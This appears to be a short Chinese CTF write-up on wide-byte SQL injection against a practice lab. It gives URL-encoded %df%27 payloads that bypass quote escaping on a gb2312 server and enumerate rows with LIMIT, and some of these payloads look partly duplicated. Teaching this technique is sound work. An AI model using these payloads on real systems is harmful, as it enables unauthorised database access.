SQL注入之 宽字节注入
https://blog.csdn.net/helloc0de/article/details/76180190 在了解了宽字节之后,看一下题目(注入关3) 思路: 1.先查看源码,显示id=1;题目可能在此注入,尝试sql注入http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php/?id=1 or 1=1#,失败; 2.用burp suite抓包,charset=gb2312,说明服务器编码为宽字节类型,所以在用sql注入时,我们用的是UTF-8编码,所以上传到服务器读取时候,服务器将上传的id按照宽字节类型转码,所以注入失败。 3.于是用宽字节类型上传,即将?id=1 or 1=1#改为?id=%df%27%20or%201=1%20%23显示一行还是原样,用sql中 的limit
?id=%df%27%20or%201=1%20limit%201=1%20limit%201,1%23还没显示出来,继续 ?id=%df%27%20or%201=1%20limit%201=1%20limit%202,1%23 成功,以上的%**均为URL编码所得。URL编码如下:
注:可在火狐的hackbar上传,可以省略好多转化
